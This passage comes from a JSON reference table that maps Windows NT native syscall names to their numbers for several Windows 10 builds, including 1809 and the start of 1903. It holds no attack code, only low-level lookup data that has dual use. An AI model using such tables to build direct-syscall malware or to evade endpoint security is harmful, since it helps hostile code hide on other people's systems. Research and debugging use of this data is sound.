\"NtFlushProcessWriteBuffers\": \"227\", \"NtFlushVirtualMemory\": \"228\", \"NtFlushWriteBuffer\": \"229\", \"NtFreeUserPhysicalPages\": \"230\", \"NtFreezeRegistry\": \"231\", \"NtFreezeTransactions\": \"232\", \"NtGetCachedSigningLevel\": \"233\", \"NtGetCompleteWnfStateSubscription\": \"234\", \"NtGetContextThread\": \"235\", \"NtGetCurrentProcessorNumber\": \"236\", \"NtGetCurrentProcessorNumberEx\": \"237\", \"NtGetDevicePowerState\": \"238\", \"NtGetMUIRegistryInfo\": \"239\", \"NtGetNextProcess\": \"240\", \"NtGetNextThread\": \"241\", \"NtGetNlsSectionPtr\": \"242\", \"NtGetNotificationResourceManager\": \"243\", \"NtGetWriteWatch\": \"244\", \"NtImpersonateAnonymousToken\": \"245\", \"NtImpersonateThread\": \"246\", \"NtInitializeEnclave\": \"247\", \"NtInitializeNlsFiles\": \"248\", \"NtInitializeRegistry\": \"249\", \"NtInitiatePowerAction\": \"250\", \"NtIsSystemResumeAutomatic\": \"251\", \"NtIsUILanguageComitted\": \"252\", \"NtListenPort\": \"253\", \"NtLoadDriver\": \"254\", \"NtLoadEnclaveData\": \"255\", \"NtLoadHotPatch\": \"256\", \"NtLoadKey\": \"257\", \"NtLoadKey2\": \"258\", \"NtLoadKeyEx\": \"259\", \"NtLockFile\": \"260\", \"NtLockProductActivationKeys\": \"261\", \"NtLockRegistryKey\": \"262\", \"NtLockVirtualMemory\": \"263\", \"NtMakePermanentObject\": \"264\", \"NtMakeTemporaryObject\": \"265\", \"NtManagePartition\": \"266\", \"NtMapCMFModule\": \"267\", \"NtMapUserPhysicalPages\": \"268\", \"NtMapViewOfSectionEx\": \"269\", \"NtModifyBootEntry\": \"270\", \"NtModifyDriverEntry\": \"271\", \"NtNotifyChangeDirectoryFile\": \"272\", \"NtNotifyChangeDirectoryFileEx\": \"273\", \"NtNotifyChangeKey\": \"274\", \"NtNotifyChangeMultipleKeys\": \"275\", \"NtNotifyChangeSession\": \"276\", \"NtOpenEnlistment\": \"277\", \"NtOpenEventPair\": \"278\", \"NtOpenIoCompletion\": \"279\", \"NtOpenJobObject\": \"280\", \"NtOpenKeyEx\": \"281\", \"NtOpenKeyTransacted\": \"282\", \"NtOpenKeyTransactedEx\": \"283\", \"NtOpenKeyedEvent\": \"284\", \"NtOpenMutant\": \"285\", \"NtOpenObjectAuditAlarm\": \"286\", \"NtOpenPartition\": \"287\", \"NtOpenPrivateNamespace\": \"288\", \"NtOpenProcessToken\": \"289\", \"NtOpenRegistryTransaction\": \"290\", \"NtOpenResourceManager\": \"291\", \"NtOpenSemaphore\": \"292\", \"NtOpenSession\": \"293\", \"NtOpenSymbolicLinkObject\": \"294\", \"NtOpenThread\": \"295\", \"NtOpenTimer\": \"296\", \"NtOpenTransaction\": \"297\", \"NtOpenTransactionManager\": \"298\", \"NtPlugPlayControl\": \"299\", \"NtPrePrepareComplete\": \"300\", \"NtPrePrepareEnlistment\": \"301\", \"NtPrepareComplete\": \"302\", \"NtPrepareEnlistment\": \"303\", \"NtPrivilegeCheck\": \"304\", \"NtPrivilegeObjectAuditAlarm\": \"305\", \"NtPrivilegedServiceAuditAlarm\": \"306\", \"NtPropagationComplete\": \"307\", \"NtPropagationFailed\": \"308\", \"NtPulseEvent\": \"309\", \"NtQueryAuxiliaryCounterFrequency\": \"310\", \"NtQueryBootEntryOrder\": \"311\", \"NtQueryBootOptions\": \"312\", \"NtQueryDebugFilterState\": \"313\", \"NtQueryDirectoryFileEx\": \"314\", \"NtQueryDirectoryObject\": \"315\", \"NtQueryDriverEntryOrder\": \"316\", \"NtQueryEaFile\": \"317\", \"NtQueryFullAttributesFile\": \"318\", \"NtQueryInformationAtom\": \"319\", \"NtQueryInformationByName\": \"320\", \"NtQueryInformationEnlistment\": \"321\", \"NtQueryInformationJobObject\": \"322\", \"NtQueryInformationPort\": \"323\", \"NtQueryInformationResourceManager\": \"324\", \"NtQueryInformationTransaction\": \"325\", \"NtQueryInformationTransactionManager\": \"326\", \"NtQueryInformationWorkerFactory\": \"327\", \"NtQueryInstallUILanguage\": \"328\", \"NtQueryIntervalProfile\": \"329\", \"NtQueryIoCompletion\": \"330\", \"NtQueryLicenseValue\": \"331\", \"NtQueryMultipleValueKey\": \"332\", \"NtQueryMutant\": \"333\", \"NtQueryOpenSubKeys\": \"334\", \"NtQueryOpenSubKeysEx\": \"335\", \"NtQueryPortInformationProcess\": \"336\", \"NtQueryQuotaInformationFile\": \"337\", \"NtQuerySecurityAttributesToken\": \"338\", \"NtQuerySecurityObject\": \"339\", \"NtQuerySecurityPolicy\": \"340\", \"NtQuerySemaphore\": \"341\", \"NtQuerySymbolicLinkObject\": \"342\", \"NtQuerySystemEnvironmentValue\": \"343\", \"NtQuerySystemEnvironmentValueEx\": \"344\", \"NtQuerySystemInformationEx\": \"345\", \"NtQueryTimerResolution\": \"346\", \"NtQueryWnfStateData\": \"347\", \"NtQueryWnfStateNameInformation\": \"348\", \"NtQueueApcThreadEx\": \"349\", \"NtRaiseException\": \"350\", \"NtRaiseHardError\": \"351\", \"NtReadOnlyEnlistment\": \"352\", \"NtRecoverEnlistment\": \"353\", \"NtRecoverResourceManager\": \"354\", \"NtRecoverTransactionManager\": \"355\", \"NtRegisterProtocolAddressInformation\": \"356\", \"NtRegisterThreadTerminatePort\": \"357\", \"NtReleaseKeyedEvent\": \"358\", \"NtReleaseWorkerFactoryWorker\": \"359\", \"NtRemoveIoCompletionEx\": \"360\", \"NtRemoveProcessDebug\": \"361\", \"NtRenameKey\": \"362\", \"NtRenameTransactionManager\": \"363\", \"NtReplaceKey\": \"364\", \"NtReplacePartitionUnit\": \"365\", \"NtReplyWaitReplyPort\": \"366\", \"NtRequestPort\": \"367\", \"NtResetEvent\": \"368\", \"NtResetWriteWatch\": \"369\", \"NtRestoreKey\": \"370\", \"NtResumeProcess\": \"371\", \"NtRevertContainerImpersonation\": \"372\", \"NtRollbackComplete\": \"373\", \"NtRollbackEnlistment\": \"374\", \"NtRollbackRegistryTransaction\": \"375\", \"NtRollbackTransaction\": \"376\", \"NtRollforwardTransactionManager\": \"377\", \"NtSaveKey\": \"378\", \"NtSaveKeyEx\": \"379\", \"NtSaveMergedKeys\": \"380\", \"NtSecureConnectPort\": \"381\", \"NtSerializeBoot\": \"382\", \"NtSetBootEntryOrder\": \"383\", \"NtSetBootOptions\": \"384\", \"NtSetCachedSigningLevel\": \"385\", \"NtSetCachedSigningLevel2\": \"386\", \"NtSetContextThread\": \"387\", \"NtSetDebugFilterState\": \"388\", \"NtSetDefaultHardErrorPort\": \"389\", \"NtSetDefaultLocale\": \"390\", \"NtSetDefaultUILanguage\": \"391\", \"NtSetDriverEntryOrder\": \"392\", \"NtSetEaFile\": \"393\", \"NtSetHighEventPair\": \"394\", \"NtSetHighWaitLowEventPair\": \"395\", \"NtSetIRTimer\": \"396\", \"NtSetInformationDebugObject\": \"397\", \"NtSetInformationEnlistment\": \"398\", \"NtSetInformationJobObject\": \"399\", \"NtSetInformationKey\": \"400\", \"NtSetInformationResourceManager\": \"401\", \"NtSetInformationSymbolicLink\": \"402\", \"NtSetInformationToken\": \"403\", \"NtSetInformationTransaction\": \"404\", \"NtSetInformationTransactionManager\": \"405\", \"NtSetInformationVirtualMemory\": \"406\", \"NtSetInformationWorkerFactory\": \"407\", \"NtSetIntervalProfile\": \"408\", \"NtSetIoCompletion\": \"409\", \"NtSetIoCompletionEx\": \"410\", \"NtSetLdtEntries\": \"411\", \"NtSetLowEventPair\": \"412\", \"NtSetLowWaitHighEventPair\": \"413\", \"NtSetQuotaInformationFile\": \"414\", \"NtSetSecurityObject\": \"415\", \"NtSetSystemEnvironmentValue\": \"416\", \"NtSetSystemEnvironmentValueEx\": \"417\", \"NtSetSystemInformation\": \"418\", \"NtSetSystemPowerState\": \"419\", \"NtSetSystemTime\": \"420\", \"NtSetThreadExecutionState\": \"421\", \"NtSetTimer2\": \"422\", \"NtSetTimerEx\": \"423\", \"NtSetTimerResolution\": \"424\", \"NtSetUuidSeed\": \"425\", \"NtSetVolumeInformationFile\": \"426\", \"NtSetWnfProcessNotificationEvent\": \"427\", \"NtShutdownSystem\": \"428\", \"NtShutdownWorkerFactory\": \"429\", \"NtSignalAndWaitForSingleObject\": \"430\", \"NtSinglePhaseReject\": \"431\", \"NtStartProfile\": \"432\", \"NtStopProfile\": \"433\", \"NtSubscribeWnfStateChange\": \"434\", \"NtSuspendProcess\": \"435\", \"NtSuspendThread\": \"436\", \"NtSystemDebugControl\": \"437\", \"NtTerminateEnclave\": \"438\", \"NtTerminateJobObject\": \"439\", \"NtTestAlert\": \"440\", \"NtThawRegistry\": \"441\", \"NtThawTransactions\": \"442\", \"NtTraceControl\": \"443\", \"NtTranslateFilePath\": \"444\", \"NtUmsThreadYield\": \"445\", \"NtUnloadDriver\": \"446\", \"NtUnloadKey\": \"447\", \"NtUnloadKey2\": \"448\", \"NtUnloadKeyEx\": \"449\", \"NtUnlockFile\": \"450\", \"NtUnlockVirtualMemory\": \"451\", \"NtUnmapViewOfSectionEx\": \"452\", \"NtUnsubscribeWnfStateChange\": \"453\", \"NtUpdateWnfStateData\": \"454\", \"NtVdmControl\": \"455\", \"NtWaitForAlertByThreadId\": \"456\", \"NtWaitForDebugEvent\": \"457\", \"NtWaitForKeyedEvent\": \"458\", \"NtWaitForWorkViaWorkerFactory\": \"459\", \"NtWaitHighEventPair\": \"460\", \"NtWaitLowEventPair\": \"461\"}, \"1809\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", \"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAcquireProcessActivityReference\": \"103\", \"NtAddAtomEx\": \"104\", \"NtAddBootEntry\": \"105\", \"NtAddDriverEntry\": \"106\", \"NtAdjustGroupsToken\": \"107\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"108\", \"NtAlertResumeThread\": \"109\", \"NtAlertThread\": \"110\", \"NtAlertThreadByThreadId\": \"111\", \"NtAllocateLocallyUniqueId\": \"112\", \"NtAllocateReserveObject\": \"113\", \"NtAllocateUserPhysicalPages\": \"114\", \"NtAllocateUuids\": \"115\", \"NtAllocateVirtualMemoryEx\": \"116\", \"NtAlpcAcceptConnectPort\": \"117\", \"NtAlpcCancelMessage\": \"118\", \"NtAlpcConnectPort\": \"119\", \"NtAlpcConnectPortEx\": \"120\", \"NtAlpcCreatePort\": \"121\", \"NtAlpcCreatePortSection\": \"122\", \"NtAlpcCreateResourceReserve\": \"123\", \"NtAlpcCreateSectionView\": \"124\", \"NtAlpcCreateSecurityContext\": \"125\", \"NtAlpcDeletePortSection\": \"126\", \"NtAlpcDeleteResourceReserve\": \"127\", \"NtAlpcDeleteSectionView\": \"128\", \"NtAlpcDeleteSecurityContext\": \"129\", \"NtAlpcDisconnectPort\": \"130\", \"NtAlpcImpersonateClientContainerOfPort\": \"131\", \"NtAlpcImpersonateClientOfPort\": \"132\", \"NtAlpcOpenSenderProcess\": \"133\", \"NtAlpcOpenSenderThread\": \"134\", \"NtAlpcQueryInformation\": \"135\", \"NtAlpcQueryInformationMessage\": \"136\", \"NtAlpcRevokeSecurityContext\": \"137\", \"NtAlpcSendWaitReceivePort\": \"138\", \"NtAlpcSetInformation\": \"139\", \"NtAreMappedFilesTheSame\": \"140\", \"NtAssignProcessToJobObject\": \"141\", \"NtAssociateWaitCompletionPacket\": \"142\", \"NtCallEnclave\": \"143\", \"NtCancelIoFileEx\": \"144\", \"NtCancelSynchronousIoFile\": \"145\", \"NtCancelTimer2\": \"146\", \"NtCancelWaitCompletionPacket\": \"147\", \"NtCommitComplete\": \"148\", \"NtCommitEnlistment\": \"149\", \"NtCommitRegistryTransaction\": \"150\", \"NtCommitTransaction\": \"151\", \"NtCompactKeys\": \"152\", \"NtCompareObjects\": \"153\", \"NtCompareSigningLevels\": \"154\", \"NtCompareTokens\": \"155\", \"NtCompleteConnectPort\": \"156\", \"NtCompressKey\": \"157\", \"NtConnectPort\": \"158\", \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": \"159\", \"NtCreateDebugObject\": \"160\", \"NtCreateDirectoryObject\": \"161\", \"NtCreateDirectoryObjectEx\": \"162\", \"NtCreateEnclave\": \"163\", \"NtCreateEnlistment\": \"164\", \"NtCreateEventPair\": \"165\", \"NtCreateIRTimer\": \"166\", \"NtCreateIoCompletion\": \"167\", \"NtCreateJobObject\": \"168\", \"NtCreateJobSet\": \"169\", \"NtCreateKeyTransacted\": \"170\", \"NtCreateKeyedEvent\": \"171\", \"NtCreateLowBoxToken\": \"172\", \"NtCreateMailslotFile\": \"173\", \"NtCreateMutant\": \"174\", \"NtCreateNamedPipeFile\": \"175\", \"NtCreatePagingFile\": \"176\", \"NtCreatePartition\": \"177\", \"NtCreatePort\": \"178\", \"NtCreatePrivateNamespace\": \"179\", \"NtCreateProcess\": \"180\", \"NtCreateProfile\": \"181\", \"NtCreateProfileEx\": \"182\", \"NtCreateRegistryTransaction\": \"183\", \"NtCreateResourceManager\": \"184\", \"NtCreateSectionEx\": \"185\", \"NtCreateSemaphore\": \"186\", \"NtCreateSymbolicLinkObject\": \"187\", \"NtCreateThreadEx\": \"188\", \"NtCreateTimer\": \"189\", \"NtCreateTimer2\": \"190\", \"NtCreateToken\": \"191\", \"NtCreateTokenEx\": \"192\", \"NtCreateTransaction\": \"193\", \"NtCreateTransactionManager\": \"194\", \"NtCreateUserProcess\": \"195\", \"NtCreateWaitCompletionPacket\": \"196\", \"NtCreateWaitablePort\": \"197\", \"NtCreateWnfStateName\": \"198\", \"NtCreateWorkerFactory\": \"199\", \"NtDebugActiveProcess\": \"200\", \"NtDebugContinue\": \"201\", \"NtDeleteAtom\": \"202\", \"NtDeleteBootEntry\": \"203\", \"NtDeleteDriverEntry\": \"204\", \"NtDeleteFile\": \"205\", \"NtDeleteKey\": \"206\", \"NtDeleteObjectAuditAlarm\": \"207\", \"NtDeletePrivateNamespace\": \"208\", \"NtDeleteValueKey\": \"209\", \"NtDeleteWnfStateData\": \"210\", \"NtDeleteWnfStateName\": \"211\", \"NtDisableLastKnownGood\": \"212\", \"NtDisplayString\": \"213\", \"NtDrawText\": \"214\", \"NtEnableLastKnownGood\": \"215\", \"NtEnumerateBootEntries\": \"216\", \"NtEnumerateDriverEntries\": \"217\", \"NtEnumerateSystemEnvironmentValuesEx\": \"218\", \"NtEnumerateTransactionObject\": \"219\", \"NtExtendSection\": \"220\", \"NtFilterBootOption\": \"221\", \"NtFilterToken\": \"222\", \"NtFilterTokenEx\": \"223\", \"NtFlushBuffersFileEx\": \"224\", \"NtFlushInstallUILanguage\": \"225\", \"NtFlushInstructionCache\": \"226\", \"NtFlushKey\": \"227\", \"NtFlushProcessWriteBuffers\": \"228\", \"NtFlushVirtualMemory\": \"229\", \"NtFlushWriteBuffer\": \"230\", \"NtFreeUserPhysicalPages\": \"231\", \"NtFreezeRegistry\": \"232\", \"NtFreezeTransactions\": \"233\", \"NtGetCachedSigningLevel\": \"234\", \"NtGetCompleteWnfStateSubscription\": \"235\", \"NtGetContextThread\": \"236\", \"NtGetCurrentProcessorNumber\": \"237\", \"NtGetCurrentProcessorNumberEx\": \"238\", \"NtGetDevicePowerState\": \"239\", \"NtGetMUIRegistryInfo\": \"240\", \"NtGetNextProcess\": \"241\", \"NtGetNextThread\": \"242\", \"NtGetNlsSectionPtr\": \"243\", \"NtGetNotificationResourceManager\": \"244\", \"NtGetWriteWatch\": \"245\", \"NtImpersonateAnonymousToken\": \"246\", \"NtImpersonateThread\": \"247\", \"NtInitializeEnclave\": \"248\", \"NtInitializeNlsFiles\": \"249\", \"NtInitializeRegistry\": \"250\", \"NtInitiatePowerAction\": \"251\", \"NtIsSystemResumeAutomatic\": \"252\", \"NtIsUILanguageComitted\": \"253\", \"NtListenPort\": \"254\", \"NtLoadDriver\": \"255\", \"NtLoadEnclaveData\": \"256\", \"NtLoadKey\": \"257\", \"NtLoadKey2\": \"258\", \"NtLoadKeyEx\": \"259\", \"NtLockFile\": \"260\", \"NtLockProductActivationKeys\": \"261\", \"NtLockRegistryKey\": \"262\", \"NtLockVirtualMemory\": \"263\", \"NtMakePermanentObject\": \"264\", \"NtMakeTemporaryObject\": \"265\", \"NtManageHotPatch\": \"266\", \"NtManagePartition\": \"267\", \"NtMapCMFModule\": \"268\", \"NtMapUserPhysicalPages\": \"269\", \"NtMapViewOfSectionEx\": \"270\", \"NtModifyBootEntry\": \"271\", \"NtModifyDriverEntry\": \"272\", \"NtNotifyChangeDirectoryFile\": \"273\", \"NtNotifyChangeDirectoryFileEx\": \"274\", \"NtNotifyChangeKey\": \"275\", \"NtNotifyChangeMultipleKeys\": \"276\", \"NtNotifyChangeSession\": \"277\", \"NtOpenEnlistment\": \"278\", \"NtOpenEventPair\": \"279\", \"NtOpenIoCompletion\": \"280\", \"NtOpenJobObject\": \"281\", \"NtOpenKeyEx\": \"282\", \"NtOpenKeyTransacted\": \"283\", \"NtOpenKeyTransactedEx\": \"284\", \"NtOpenKeyedEvent\": \"285\", \"NtOpenMutant\": \"286\", \"NtOpenObjectAuditAlarm\": \"287\", \"NtOpenPartition\": \"288\", \"NtOpenPrivateNamespace\": \"289\", \"NtOpenProcessToken\": \"290\", \"NtOpenRegistryTransaction\": \"291\", \"NtOpenResourceManager\": \"292\", \"NtOpenSemaphore\": \"293\", \"NtOpenSession\": \"294\", \"NtOpenSymbolicLinkObject\": \"295\", \"NtOpenThread\": \"296\", \"NtOpenTimer\": \"297\", \"NtOpenTransaction\": \"298\", \"NtOpenTransactionManager\": \"299\", \"NtPlugPlayControl\": \"300\", \"NtPrePrepareComplete\": \"301\", \"NtPrePrepareEnlistment\": \"302\", \"NtPrepareComplete\": \"303\", \"NtPrepareEnlistment\": \"304\", \"NtPrivilegeCheck\": \"305\", \"NtPrivilegeObjectAuditAlarm\": \"306\", \"NtPrivilegedServiceAuditAlarm\": \"307\", \"NtPropagationComplete\": \"308\", \"NtPropagationFailed\": \"309\", \"NtPulseEvent\": \"310\", \"NtQueryAuxiliaryCounterFrequency\": \"311\", \"NtQueryBootEntryOrder\": \"312\", \"NtQueryBootOptions\": \"313\", \"NtQueryDebugFilterState\": \"314\", \"NtQueryDirectoryFileEx\": \"315\", \"NtQueryDirectoryObject\": \"316\", \"NtQueryDriverEntryOrder\": \"317\", \"NtQueryEaFile\": \"318\", \"NtQueryFullAttributesFile\": \"319\", \"NtQueryInformationAtom\": \"320\", \"NtQueryInformationByName\": \"321\", \"NtQueryInformationEnlistment\": \"322\", \"NtQueryInformationJobObject\": \"323\", \"NtQueryInformationPort\": \"324\", \"NtQueryInformationResourceManager\": \"325\", \"NtQueryInformationTransaction\": \"326\", \"NtQueryInformationTransactionManager\": \"327\", \"NtQueryInformationWorkerFactory\": \"328\", \"NtQueryInstallUILanguage\": \"329\", \"NtQueryIntervalProfile\": \"330\", \"NtQueryIoCompletion\": \"331\", \"NtQueryLicenseValue\": \"332\", \"NtQueryMultipleValueKey\": \"333\", \"NtQueryMutant\": \"334\", \"NtQueryOpenSubKeys\": \"335\", \"NtQueryOpenSubKeysEx\": \"336\", \"NtQueryPortInformationProcess\": \"337\", \"NtQueryQuotaInformationFile\": \"338\", \"NtQuerySecurityAttributesToken\": \"339\", \"NtQuerySecurityObject\": \"340\", \"NtQuerySecurityPolicy\": \"341\", \"NtQuerySemaphore\": \"342\", \"NtQuerySymbolicLinkObject\": \"343\", \"NtQuerySystemEnvironmentValue\": \"344\", \"NtQuerySystemEnvironmentValueEx\": \"345\", \"NtQuerySystemInformationEx\": \"346\", \"NtQueryTimerResolution\": \"347\", \"NtQueryWnfStateData\": \"348\", \"NtQueryWnfStateNameInformation\": \"349\", \"NtQueueApcThreadEx\": \"350\", \"NtRaiseException\": \"351\", \"NtRaiseHardError\": \"352\", \"NtReadOnlyEnlistment\": \"353\", \"NtRecoverEnlistment\": \"354\", \"NtRecoverResourceManager\": \"355\", \"NtRecoverTransactionManager\": \"356\", \"NtRegisterProtocolAddressInformation\": \"357\", \"NtRegisterThreadTerminatePort\": \"358\", \"NtReleaseKeyedEvent\": \"359\", \"NtReleaseWorkerFactoryWorker\": \"360\", \"NtRemoveIoCompletionEx\": \"361\", \"NtRemoveProcessDebug\": \"362\", \"NtRenameKey\": \"363\", \"NtRenameTransactionManager\": \"364\", \"NtReplaceKey\": \"365\", \"NtReplacePartitionUnit\": \"366\", \"NtReplyWaitReplyPort\": \"367\", \"NtRequestPort\": \"368\", \"NtResetEvent\": \"369\", \"NtResetWriteWatch\": \"370\", \"NtRestoreKey\": \"371\", \"NtResumeProcess\": \"372\", \"NtRevertContainerImpersonation\": \"373\", \"NtRollbackComplete\": \"374\", \"NtRollbackEnlistment\": \"375\", \"NtRollbackRegistryTransaction\": \"376\", \"NtRollbackTransaction\": \"377\", \"NtRollforwardTransactionManager\": \"378\", \"NtSaveKey\": \"379\", \"NtSaveKeyEx\": \"380\", \"NtSaveMergedKeys\": \"381\", \"NtSecureConnectPort\": \"382\", \"NtSerializeBoot\": \"383\", \"NtSetBootEntryOrder\": \"384\", \"NtSetBootOptions\": \"385\", \"NtSetCachedSigningLevel\": \"386\", \"NtSetCachedSigningLevel2\": \"387\", \"NtSetContextThread\": \"388\", \"NtSetDebugFilterState\": \"389\", \"NtSetDefaultHardErrorPort\": \"390\", \"NtSetDefaultLocale\": \"391\", \"NtSetDefaultUILanguage\": \"392\", \"NtSetDriverEntryOrder\": \"393\", \"NtSetEaFile\": \"394\", \"NtSetHighEventPair\": \"395\", \"NtSetHighWaitLowEventPair\": \"396\", \"NtSetIRTimer\": \"397\", \"NtSetInformationDebugObject\": \"398\", \"NtSetInformationEnlistment\": \"399\", \"NtSetInformationJobObject\": \"400\", \"NtSetInformationKey\": \"401\", \"NtSetInformationResourceManager\": \"402\", \"NtSetInformationSymbolicLink\": \"403\", \"NtSetInformationToken\": \"404\", \"NtSetInformationTransaction\": \"405\", \"NtSetInformationTransactionManager\": \"406\", \"NtSetInformationVirtualMemory\": \"407\", \"NtSetInformationWorkerFactory\": \"408\", \"NtSetIntervalProfile\": \"409\", \"NtSetIoCompletion\": \"410\", \"NtSetIoCompletionEx\": \"411\", \"NtSetLdtEntries\": \"412\", \"NtSetLowEventPair\": \"413\", \"NtSetLowWaitHighEventPair\": \"414\", \"NtSetQuotaInformationFile\": \"415\", \"NtSetSecurityObject\": \"416\", \"NtSetSystemEnvironmentValue\": \"417\", \"NtSetSystemEnvironmentValueEx\": \"418\", \"NtSetSystemInformation\": \"419\", \"NtSetSystemPowerState\": \"420\", \"NtSetSystemTime\": \"421\", \"NtSetThreadExecutionState\": \"422\", \"NtSetTimer2\": \"423\", \"NtSetTimerEx\": \"424\", \"NtSetTimerResolution\": \"425\", \"NtSetUuidSeed\": \"426\", \"NtSetVolumeInformationFile\": \"427\", \"NtSetWnfProcessNotificationEvent\": \"428\", \"NtShutdownSystem\": \"429\", \"NtShutdownWorkerFactory\": \"430\", \"NtSignalAndWaitForSingleObject\": \"431\", \"NtSinglePhaseReject\": \"432\", \"NtStartProfile\": \"433\", \"NtStopProfile\": \"434\", \"NtSubscribeWnfStateChange\": \"435\", \"NtSuspendProcess\": \"436\", \"NtSuspendThread\": \"437\", \"NtSystemDebugControl\": \"438\", \"NtTerminateEnclave\": \"439\", \"NtTerminateJobObject\": \"440\", \"NtTestAlert\": \"441\", \"NtThawRegistry\": \"442\", \"NtThawTransactions\": \"443\", \"NtTraceControl\": \"444\", \"NtTranslateFilePath\": \"445\", \"NtUmsThreadYield\": \"446\", \"NtUnloadDriver\": \"447\", \"NtUnloadKey\": \"448\", \"NtUnloadKey2\": \"449\", \"NtUnloadKeyEx\": \"450\", \"NtUnlockFile\": \"451\", \"NtUnlockVirtualMemory\": \"452\", \"NtUnmapViewOfSectionEx\": \"453\", \"NtUnsubscribeWnfStateChange\": \"454\", \"NtUpdateWnfStateData\": \"455\", \"NtVdmControl\": \"456\", \"NtWaitForAlertByThreadId\": \"457\", \"NtWaitForDebugEvent\": \"458\", \"NtWaitForKeyedEvent\": \"459\", \"NtWaitForWorkViaWorkerFactory\": \"460\", \"NtWaitHighEventPair\": \"461\", \"NtWaitLowEventPair\": \"462\"}, \"1903\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", 